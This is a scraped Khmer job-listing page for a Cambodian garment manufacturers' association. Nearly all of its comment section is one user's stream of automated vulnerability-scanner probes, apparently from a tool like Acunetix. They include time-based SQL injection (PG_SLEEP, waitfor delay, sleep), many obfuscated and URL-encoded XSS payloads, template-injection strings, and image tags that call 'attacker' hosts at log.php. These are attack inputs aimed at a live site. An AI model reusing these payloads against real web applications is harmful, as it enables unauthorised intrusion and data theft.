ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

សមាគម​រោងចក្រ​កាត់ដេរ​នៅ​កម្ពុជា
ក្រោយឆ្នាំ១៩៩៣ វិស័យកាត់ដេរនៅកម្ពុជាមានការរីកចម្រើនយ៉ាងខ្លាំង មានរោងចក្រកាន់តែច្រើនបានបើកជាបន្តបន្ទាប់ និងបានបង្កើតនូវឱកាសការងាររាប់សែនសម្រាប់ប្រជាពលរដ្ឋកម្ពុជា ជាពិសេសស្ត្រីដែលមកពីតាមបណ្តាខេត្តនិងជនបទនានា ដែលពុំសូវបានទទួលការសិក្សា។ ការរីកចម្រើននៃវិស័យនេះតម្រូវអោយមានការបង្កើតឡើងនូវសមាគមរោងចក្រកាត់ដេរនៅកម្ពុជាហៅកាត់ថា (GMAC) ដែលមានតួរនាទីជាអ្នកតំណាងអោយវិស័យ និងអនុវត្តការងារទាំងឡាយសំដៅលើកកំពស់វិស័យនេះអោយមានកំណើននិងការអភិវឌ្ឍន៍ប្រកបដោយចេរភាព។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 18

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 300 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 04:42:08


  @@2Eoi1


 • pHqghUme

  2021-05-06 04:42:03


  1'"


 • pHqghUme

  2021-05-06 04:42:01


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 04:41:39


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 04:41:15


  4X4qw3DR')) OR 760=(SELECT 760 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:40:52


  dvIQ80cZ') OR 268=(SELECT 268 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:40:31


  sto4GPjr' OR 133=(SELECT 133 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:40:14


  -1)) OR 988=(SELECT 988 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:39:54


  -5) OR 312=(SELECT 312 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:39:46


  1<3ALGoj<


 • pHqghUme

  2021-05-06 04:39:35


  1<img sRc='http://attacker-9558/log.php?


 • pHqghUme

  2021-05-06 04:39:34


  -5 OR 156=(SELECT 156 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 04:39:25


  1<ZMbSe3 x=9813>


 • pHqghUme<5fYWYs<

  2021-05-06 04:39:18


  1


 • pHqghUme

  2021-05-06 04:39:12


  1<ifRAme sRc=9770.com></IfRamE>


 • pHqghUme

  2021-05-06 04:39:12


  lMM0IvJz'; waitfor delay '0:0:15' --


 • pHqghUme<img sRc='http://attacker-9561/log.php?

  2021-05-06 04:39:08


  1


 • pHqghUme

  2021-05-06 04:39:03


  1<WRJRQN>UVDQE[!+!]</WRJRQN>


 • pHqghUme<bJuYnO x=9165>

  2021-05-06 04:39:00


  1


 • pHqghUme

  2021-05-06 04:38:53


  1uSt00 <ScRiPt >QjSx(9214)</ScRiPt>


 • pHqghUme

  2021-05-06 04:38:52


  1 waitfor delay '0:0:15' --


 • pHqghUme<ifRAme sRc=9674.com></IfRamE>

  2021-05-06 04:38:51


  1


 • pHqghUme<WT3HQF>FLOOY[!+!]</WT3HQF>

  2021-05-06 04:38:43


  1


 • pHqghUme

  2021-05-06 04:38:43


  1<% contenteditable onresize=QjSx(9198)>


 • pHqghUme

  2021-05-06 04:38:33


  -1); waitfor delay '0:0:15' --


 • pHqghUme2phyC <ScRiPt >Oh7I(9456)</ScRiPt>

  2021-05-06 04:38:33


  1


 • pHqghUme

  2021-05-06 04:38:32


  1}body{acu:Expre/**/SSion(QjSx(9500))}


 • pHqghUme<% contenteditable onresize=Oh7I(9116)>

  2021-05-06 04:38:24


  1


 • pHqghUme

  2021-05-06 04:38:23


  <a HrEF=jaVaScRiPT:>


 • pHqghUme}body{acu:Expre/**/SSion(Oh7I(9806))}

  2021-05-06 04:38:17


  1


 • pHqghUme

  2021-05-06 04:38:15


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 04:38:14


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme<xctFTX<

  2021-05-06 04:38:10


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 04:38:02


  1


 • pHqghUme

  2021-05-06 04:37:56


  1<input autofocus onfocus=QjSx(9552)>


 • pHqghUme<img sRc='http://attacker-9554/log.php?

  2021-05-06 04:37:55


  1


 • pHqghUme

  2021-05-06 04:37:49


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 04:37:48


  1


 • pHqghUme<Y3QVIr x=9517>

  2021-05-06 04:37:46


  1


 • pHqghUme<input autofocus onfocus=Oh7I(9399)>

  2021-05-06 04:37:39


  1


 • pHqghUme<ifRAme sRc=9282.com></IfRamE>

  2021-05-06 04:37:38


  1


 • pHqghUme

  2021-05-06 04:37:34


  1&lt;ScRiPt&gt;QjSx(9986)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 04:37:33


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme<W7ZLAP>1UDKV[!+!]</W7ZLAP>

  2021-05-06 04:37:28


  1


 • pHqghUme

  2021-05-06 04:37:25


  1\u003CScRiPt\QjSx(9207)\u003C/sCripT\u003E


 • pHqghUme&lt;ScRiPt&gt;Oh7I(9994)&lt;/sCripT&gt;

  2021-05-06 04:37:22


  1


 • pHqghUmeLG32D <ScRiPt >2HTJ(9891)</ScRiPt>

  2021-05-06 04:37:18


  1


 • pHqghUme

  2021-05-06 04:37:17


  1<hEpjuy<


 • pHqghUme\u003CScRiPt\Oh7I(9760)\u003C/sCripT\u003E

  2021-05-06 04:37:16


  1


 • pHqghUme

  2021-05-06 04:37:13


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 04:37:11


  %31%3C%53%63%52%69%50%74%20%3E%51%6A%53%78%289185%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 04:37:10


  1<img sRc='http://attacker-9145/log.php?


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4F%68%37%49%289550%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 04:37:07


  1


 • pHqghUme<% contenteditable onresize=2HTJ(9629)>

  2021-05-06 04:37:06


  1


 • pHqghUme

  2021-05-06 04:37:03


  1<A04q7G x=9875>


 • pHqghUme

  2021-05-06 04:37:01


  1<img/src=">" onerror=alert(9032)>


 • pHqghUme<img/src=">" onerror=alert(9378)>

  2021-05-06 04:36:57


  1


 • pHqghUme}body{acu:Expre/**/SSion(2HTJ(9877))}

  2021-05-06 04:36:55


  1


 • pHqghUme

  2021-05-06 04:36:55


  1<ifRAme sRc=9388.com></IfRamE>


 • pHqghUme

  2021-05-06 04:36:48


  1<img src=xyz OnErRor=QjSx(9147)>


 • pHqghUme<img src=xyz OnErRor=Oh7I(9535)>

  2021-05-06 04:36:46


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 04:36:46


  1


 • pHqghUme

  2021-05-06 04:36:45


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 04:36:40


  1<img src=//xss.bxss.me/t/dot.gif onload=QjSx(9522)>


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 04:36:38


  1


 • pHqghUme

  2021-05-06 04:36:34


  1<WJTJNZ>HF1FP[!+!]</WJTJNZ>


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=Oh7I(9214)>

  2021-05-06 04:36:32


  1


 • pHqghUme<input autofocus onfocus=2HTJ(9248)>

  2021-05-06 04:36:29


  1


 • pHqghUme

  2021-05-06 04:36:28


  1<body onload=QjSx(9254)>


 • pHqghUme

  2021-05-06 04:36:26


  173LvE <ScRiPt >9BJT(9748)</ScRiPt>


 • pHqghUme<body onload=Oh7I(9865)>

  2021-05-06 04:36:25


  1


 • pHqghUme

  2021-05-06 04:36:18


  1<% contenteditable onresize=9BJT(9704)>


 • pHqghUme

  2021-05-06 04:36:18


  -1" OR 2+933-933-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 04:36:17


  -1' OR 2+878-878-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 04:36:17


  -1' OR 2+995-995-1=0+0+0+1 or 'f4HudmET'='


 • pHqghUme

  2021-05-06 04:36:16


  -1 OR 2+584-584-1=0+0+0+1


 • pHqghUme

  2021-05-06 04:36:15


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9149'>


 • pHqghUme

  2021-05-06 04:36:15


  -1 OR 2+382-382-1=0+0+0+1 --


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9713'>

  2021-05-06 04:36:15


  1


 • pHqghUme

  2021-05-06 04:36:14


  ZEeNFSRp


 • pHqghUme&lt;ScRiPt&gt;2HTJ(9794)&lt;/sCripT&gt;

  2021-05-06 04:36:09


  1


 • pHqghUme

  2021-05-06 04:36:04


  1}body{acu:Expre/**/SSion(9BJT(9920))}


 • pHqghUme

  2021-05-06 04:36:04


  1<isindex type=image src=1 onerror=QjSx(9566)>


 • pHqghUme\u003CScRiPt\2HTJ(9996)\u003C/sCripT\u003E

  2021-05-06 04:36:02


  1


 • pHqghUme<isindex type=image src=1 onerror=Oh7I(9101)>

  2021-05-06 04:36:01


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%32%48%54%4A%289235%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 04:35:55


  1


 • pHqghUme

  2021-05-06 04:35:54


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 04:35:47


  1


 • pHqghUme<img/src=">" onerror=alert(9786)>

  2021-05-06 04:35:46


  1


 • pHqghUme

  2021-05-06 04:35:44


  1<ScRiPt >QjSx(9837)</ScRiPt>


 • pHqghUme

  2021-05-06 04:35:43


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme<ScRiPt >Oh7I(9203)</ScRiPt>

  2021-05-06 04:35:41


  1


 • pHqghUme<img src=xyz OnErRor=2HTJ(9614)>

  2021-05-06 04:35:33


  1


 • pHqghUme

  2021-05-06 04:35:33


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9328></ScRiPt>


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9076></ScRiPt>

  2021-05-06 04:35:31


  1


 • pHqghUme

  2021-05-06 04:35:30


  1<input autofocus onfocus=9BJT(9805)>


 • pHqghUme

  2021-05-06 04:35:24


  1<ScRiPt >QjSx(9917)</ScRiPt>


 • pHqghUme

  2021-05-06 04:35:24


  1


 • pHqghUme<ScRiPt >Oh7I(9058)</ScRiPt>

  2021-05-06 04:35:22


  1


 • pHqghUme

  2021-05-06 04:35:17


  1&lt;ScRiPt&gt;9BJT(9682)&lt;/sCripT&gt;


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4F%68%37%49%28%39%39%33%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 04:35:13


  1


 • pHqghUme

  2021-05-06 04:35:07


  1\u003CScRiPt\9BJT(9510)\u003C/sCripT\u003E


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=2HTJ(9136)>

  2021-05-06 04:35:05


  1


 • @@X4s5K

  2021-05-06 04:35:02


  1


 • pHqghUme

  2021-05-06 04:35:00


  %31%3C%53%63%52%69%50%74%20%3E%39%42%4A%54%289471%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 04:34:57


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%51%6A%53%78%28%39%39%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • 1'"

  2021-05-06 04:34:55


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 04:34:54


  1


 • pHqghUme<script>Oh7I(9585)</script>

  2021-05-06 04:34:54


  1


 • pHqghUme<body onload=2HTJ(9607)>

  2021-05-06 04:34:51


  1


 • pHqghUme

  2021-05-06 04:34:51


  1<img/src=">" onerror=alert(9502)>


 • pHqghUme

  2021-05-06 04:34:45


  1<script>QjSx(9261)</script>


 • pHqghUme

  2021-05-06 04:34:44


  1<img src=xyz OnErRor=9BJT(9432)>


 • pHqghUme

  2021-05-06 04:34:37


  1<img src=//xss.bxss.me/t/dot.gif onload=9BJT(9573)>


 • pHqghUme

  2021-05-06 04:34:36


  1<WVFCGW>SAB1C[!+!]</WVFCGW>


 • qsFPClsI')) OR 717=(SELECT 717 FROM PG_SLEEP(15))--

  2021-05-06 04:34:33


  1


 • pHqghUme<WJM2MX>AYSCA[!+!]</WJM2MX>

  2021-05-06 04:34:21


  1


 • pHqghUme

  2021-05-06 04:34:19


  1<body onload=9BJT(9897)>


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9888'>

  2021-05-06 04:34:17


  1


 • pHqghUme<isindex type=image src=1 onerror=2HTJ(9067)>

  2021-05-06 04:34:10


  1


 • pHqghUme<ScRiPt >Oh7I(9885)</ScRiPt>

  2021-05-06 04:34:08


  1


 • pHqghUme

  2021-05-06 04:34:08


  1<ScRiPt >QjSx(9469)</ScRiPt>


 • pHqghUme

  2021-05-06 04:34:08


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9361'>


 • ZAoHnSZD') OR 247=(SELECT 247 FROM PG_SLEEP(15))--

  2021-05-06 04:33:59


  1


 • pHqghUme

  2021-05-06 04:33:56


  1<isindex type=image src=1 onerror=9BJT(9225)>


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 04:33:54


  1


 • pHqghUme<ScRiPt >2HTJ(9607)</ScRiPt>

  2021-05-06 04:33:54


  1


 • pHqghUme

  2021-05-06 04:33:52


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • acx__${98991*97996}__::.x

  2021-05-06 04:33:46


  1


 • pHqghUme

  2021-05-06 04:33:44


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 04:33:40


  1<ScRiPt >9BJT(9658)</ScRiPt>


 • BFwtAia0' OR 193=(SELECT 193 FROM PG_SLEEP(15))--

  2021-05-06 04:33:34


  1


 • pHqghUme

  2021-05-06 04:33:29


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9407></ScRiPt>


 • acx[[${98991*97996}]]xca

  2021-05-06 04:33:28


  1


 • pHqghUme

  2021-05-06 04:33:26


  acx[[${98991*97996}]]xca


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9646></ScRiPt>

  2021-05-06 04:33:25


  1


 • pHqghUme

  2021-05-06 04:33:17


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 04:33:16


  1<ScRiPt >9BJT(9860)</ScRiPt>


 • QmorMqwx'; waitfor delay '0:0:15' --

  2021-05-06 04:33:09


  1


 • pHqghUme<ScRiPt >2HTJ(9099)</ScRiPt>

  2021-05-06 04:33:07


  1


 • acx{{98991*97996}}xca

  2021-05-06 04:33:07


  1


 • pHqghUme

  2021-05-06 04:33:04


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:33:04


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%39%42%4A%54%28%39%36%31%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%32%48%54%4A%28%39%38%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 04:32:57


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 04:32:56


  1


 • pHqghUme

  2021-05-06 04:32:55


  1<script>9BJT(9013)</script>


 • pHqghUme

  2021-05-06 04:32:51


  <th:t="${acx}#foreach


 • pHqghUme<script>2HTJ(9539)</script>

  2021-05-06 04:32:48


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 04:32:48


  1


 • pHqghUme<WQJS1D>ZEZN4[!+!]</WQJS1D>

  2021-05-06 04:32:40


  1


 • <th:t="${acx}#foreach

  2021-05-06 04:32:34


  1


 • pHqghUme

  2021-05-06 04:32:30


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:32:29


  1<WSOYE1>YJUS8[!+!]</WSOYE1>


 • pHqghUme<ScRiPt >2HTJ(9015)</ScRiPt>

  2021-05-06 04:32:26


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 04:32:23


  1


 • pHqghUme

  2021-05-06 04:32:21


  1<ScRiPt >9BJT(9356)</ScRiPt>


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 04:32:19


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 04:32:16


  1


 • pHqghUme

  2021-05-06 04:32:14


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • acx__${98991*97996}__::.x

  2021-05-06 04:32:08


  1


 • pHqghUme

  2021-05-06 04:32:07


  acx__${98991*97996}__::.x


 • acux2310%C0%BEz1%C0%BCz2a%90bcxuca2310

  2021-05-06 04:32:06


  1


 • pHqghUme

  2021-05-06 04:32:05


  acux7805%C0%BEz1%C0%BCz2a%90bcxuca7805


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 04:32:03


  1


 • pHqghUme

  2021-05-06 04:32:00


  acx[[${98991*97996}]]xca


 • acx[[${98991*97996}]]xca

  2021-05-06 04:31:59


  1


 • pHqghUme

  2021-05-06 04:31:53


  acx{{98991*97996}}xca


 • acu9330%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9330

  2021-05-06 04:31:50


  1


 • pHqghUme

  2021-05-06 04:31:48


  acu6521%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6521


 • pHqghUme

  2021-05-06 04:31:47


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • acx{{98991*97996}}xca

  2021-05-06 04:31:44


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 04:31:42


  1


 • pHqghUme

  2021-05-06 04:31:38


  19834442


 • pHqghUme9488536

  2021-05-06 04:31:37


  1


 • pHqghUme

  2021-05-06 04:31:35


  <th:t="${acx}#foreach


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 04:31:30


  1


 • pHqghUme

  2021-05-06 04:31:28


  '"()&%<acx><ScRiPt >QjSx(9132)</ScRiPt>


 • pHqghUme

  2021-05-06 04:31:25


  <%={{={@{#{${acx}}%>


 • '"()&%<acx><ScRiPt >Oh7I(9458)</ScRiPt>

  2021-05-06 04:31:24


  1


 • <th:t="${acx}#foreach

  2021-05-06 04:31:21


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 04:31:19


  1


 • pHqghUme'"()&%<acx><ScRiPt >Oh7I(9500)</ScRiPt>

  2021-05-06 04:31:16


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 04:31:14


  1


 • pHqghUme

  2021-05-06 04:31:13


  1'"()&%<acx><ScRiPt >QjSx(9976)</ScRiPt>


 • acux6027%C0%BEz1%C0%BCz2a%90bcxuca6027

  2021-05-06 04:31:07


  1


 • pHqghUme

  2021-05-06 04:31:07


  acux10669%C0%BEz1%C0%BCz2a%90bcxuca10669


 • pHqghUme

  2021-05-06 04:31:00


  acu8897%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8897


 • -1" OR 2+279-279-1=0+0+0+1 --

  2021-05-06 04:30:59


  1


 • acu4340%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4340

  2021-05-06 04:30:58


  1


 • -1' OR 2+754-754-1=0+0+0+1 or '2Rb1BcOE'='

  2021-05-06 04:30:58


  1


 • -1 OR 2+995-995-1=0+0+0+1

  2021-05-06 04:30:57


  1


 • -1' OR 2+170-170-1=0+0+0+1 --

  2021-05-06 04:30:57


  1


 • 58LUJtvO

  2021-05-06 04:30:56


  1


 • -1 OR 2+417-417-1=0+0+0+1 --

  2021-05-06 04:30:56


  1


 • pHqghUme

  2021-05-06 04:30:51


  19716939


 • pHqghUme9425543

  2021-05-06 04:30:49


  1


 • pHqghUme

  2021-05-06 04:30:42


  '"()&%<acx><ScRiPt >9BJT(9917)</ScRiPt>


 • pHqghUme

  2021-05-06 04:30:39


  1


 • '"()&%<acx><ScRiPt >2HTJ(9237)</ScRiPt>

  2021-05-06 04:30:39


  1


 • pHqghUme

  2021-05-06 04:30:32


  1'"()&%<acx><ScRiPt >9BJT(9158)</ScRiPt>


 • pHqghUme'"()&%<acx><ScRiPt >2HTJ(9640)</ScRiPt>

  2021-05-06 04:30:31


  1


 • pHqghUme

  2021-05-06 04:30:21


  1


 • pHqghUme

  2021-05-06 04:30:06


  1


 • pHqghUme

  2021-05-06 04:30:04


  1


 • pHqghUme

  2021-05-06 04:30:03


  1


 • pHqghUme

  2021-05-06 04:29:49


  1


 • pHqghUme

  2021-05-06 04:29:37


  1


 • pHqghUme

  2021-05-06 04:29:22


  1


 • pHqghUme

  2021-05-06 04:29:11


  1


 • pHqghUme

  2021-05-06 04:28:58


  1


 • pHqghUme

  2021-05-06 04:28:44


  1


 • pHqghUme

  2021-05-06 04:28:27


  1


 • pHqghUme

  2021-05-06 04:28:06


  1


 • pHqghUme

  2021-05-06 04:27:46


  1


 • pHqghUme

  2021-05-06 04:27:26


  1


 • pHqghUme

  2021-05-06 04:27:25


  1


 • pHqghUme

  2021-05-06 04:27:24


  1


 • pHqghUme

  2021-05-06 04:27:23


  1


 • pHqghUme

  2021-05-06 04:27:21


  1


 • pHqghUme

  2021-05-06 04:27:20


  1


 • pHqghUme

  2021-05-06 04:26:56


  1


 • pHqghUme

  2021-05-06 04:26:27


  1


 • pHqghUme

  2021-05-06 04:26:06


  1


 • pHqghUme

  2021-05-06 04:26:01


  1


 • pHqghUme

  2021-05-06 04:26:00


  1


 • pHqghUme

  2021-05-06 04:25:38


  1


 • pHqghUme

  2021-05-06 04:25:21


  1


 • pHqghUme

  2021-05-06 04:25:03


  1


 • pHqghUme

  2021-05-06 04:24:45


  1


 • pHqghUme

  2021-05-06 04:24:25


  1


 • pHqghUme

  2021-05-06 04:24:07


  1


 • pHqghUme

  2021-05-06 04:23:49


  1


 • pHqghUme

  2021-05-06 04:23:26


  1


 • pHqghUme

  2021-05-06 04:23:08


  1


 • pHqghUme

  2021-05-06 04:22:54


  1<D6KcZK<


 • pHqghUme

  2021-05-06 04:22:50


  1<img sRc='http://attacker-9213/log.php?


 • pHqghUme

  2021-05-06 04:22:48


  1


 • pHqghUme

  2021-05-06 04:22:47


  1


 • pHqghUme

  2021-05-06 04:22:46


  1


 • pHqghUme

  2021-05-06 04:22:45


  1<zXFAt1 x=9152>


 • pHqghUme

  2021-05-06 04:22:45


  1


 • pHqghUme

  2021-05-06 04:22:44


  1


 • pHqghUme

  2021-05-06 04:22:43


  1


 • pHqghUme

  2021-05-06 04:22:41


  1<ifRAme sRc=9364.com></IfRamE>


 • pHqghUme

  2021-05-06 04:22:37


  1<WHGCOB>CVVSK[!+!]</WHGCOB>


 • pHqghUme

  2021-05-06 04:22:32


  1KyLfl <ScRiPt >h1fy(9498)</ScRiPt>


 • pHqghUme

  2021-05-06 04:22:28


  1<% contenteditable onresize=h1fy(9166)>


 • pHqghUme

  2021-05-06 04:22:24


  1}body{acu:Expre/**/SSion(h1fy(9029))}


 • pHqghUme

  2021-05-06 04:22:19


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 04:22:18


  1


 • pHqghUme

  2021-05-06 04:22:15


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 04:22:09


  1<input autofocus onfocus=h1fy(9389)>


 • pHqghUme

  2021-05-06 04:22:03


  1&lt;ScRiPt&gt;h1fy(9167)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 04:21:59


  1\u003CScRiPt\h1fy(9021)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 04:21:55


  %31%3C%53%63%52%69%50%74%20%3E%68%31%66%79%289173%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 04:21:53


  1


 • pHqghUme

  2021-05-06 04:21:51


  1<img/src=">" onerror=alert(9304)>


 • pHqghUme

  2021-05-06 04:21:46


  1<img src=xyz OnErRor=h1fy(9117)>


 • pHqghUme

  2021-05-06 04:21:41


  1<img src=//xss.bxss.me/t/dot.gif onload=h1fy(9287)>


 • pHqghUme

  2021-05-06 04:21:36


  1<body onload=h1fy(9200)>


 • pHqghUme

  2021-05-06 04:21:29


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9875'>


 • pHqghUme

  2021-05-06 04:21:22


  1<isindex type=image src=1 onerror=h1fy(9931)>


 • pHqghUme

  2021-05-06 04:21:15


  1<ScRiPt >h1fy(9282)</ScRiPt>


 • pHqghUme

  2021-05-06 04:21:05


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9140></ScRiPt>


 • pHqghUme

  2021-05-06 04:21:01


  1<ScRiPt >h1fy(9774)</ScRiPt>


 • pHqghUme

  2021-05-06 04:20:55


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%68%31%66%79%28%39%31%38%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 04:20:51


  1<script>h1fy(9125)</script>


 • pHqghUme

  2021-05-06 04:20:47


  1<W3PMYL>VTAWL[!+!]</W3PMYL>


 • pHqghUme

  2021-05-06 04:20:42


  1<ScRiPt >h1fy(9935)</ScRiPt>


 • pHqghUme

  2021-05-06 04:20:37


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 04:20:33


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 04:20:28


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 04:20:23


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 04:20:19


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:20:14


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 04:20:10


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:20:03


  acux4730%C0%BEz1%C0%BCz2a%90bcxuca4730


 • pHqghUme

  2021-05-06 04:19:58


  acu8714%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8714


 • pHqghUme

  2021-05-06 04:19:53


  19180219


 • pHqghUme

  2021-05-06 04:19:49


  '"()&%<acx><ScRiPt >h1fy(9982)</ScRiPt>


 • pHqghUme

  2021-05-06 04:19:44


  1'"()&%<acx><ScRiPt >h1fy(9987)</ScRiPt>


 • pHqghUme<1maDY1<

  2021-05-06 04:19:40


  1


 • pHqghUme<img sRc='http://attacker-9663/log.php?

  2021-05-06 04:19:37


  1


 • pHqghUme<8j7RAi x=9946>

  2021-05-06 04:19:33


  1


 • pHqghUme<ifRAme sRc=9404.com></IfRamE>

  2021-05-06 04:19:28


  1


 • pHqghUme<WLL7SY>LT6BB[!+!]</WLL7SY>

  2021-05-06 04:19:22


  1


 • pHqghUmeNf7Yn <ScRiPt >h1fy(9240)</ScRiPt>

  2021-05-06 04:19:18


  1


 • pHqghUme<% contenteditable onresize=h1fy(9839)>

  2021-05-06 04:19:14


  1


 • pHqghUme}body{acu:Expre/**/SSion(h1fy(9479))}

  2021-05-06 04:19:09


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 04:19:05


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 04:19:01


  1


 • pHqghUme<input autofocus onfocus=h1fy(9010)>

  2021-05-06 04:18:56


  1


 • pHqghUme&lt;ScRiPt&gt;h1fy(9659)&lt;/sCripT&gt;

  2021-05-06 04:18:50


  1


 • pHqghUme\u003CScRiPt\h1fy(9845)\u003C/sCripT\u003E

  2021-05-06 04:18:45


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%68%31%66%79%289987%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 04:18:41


  1


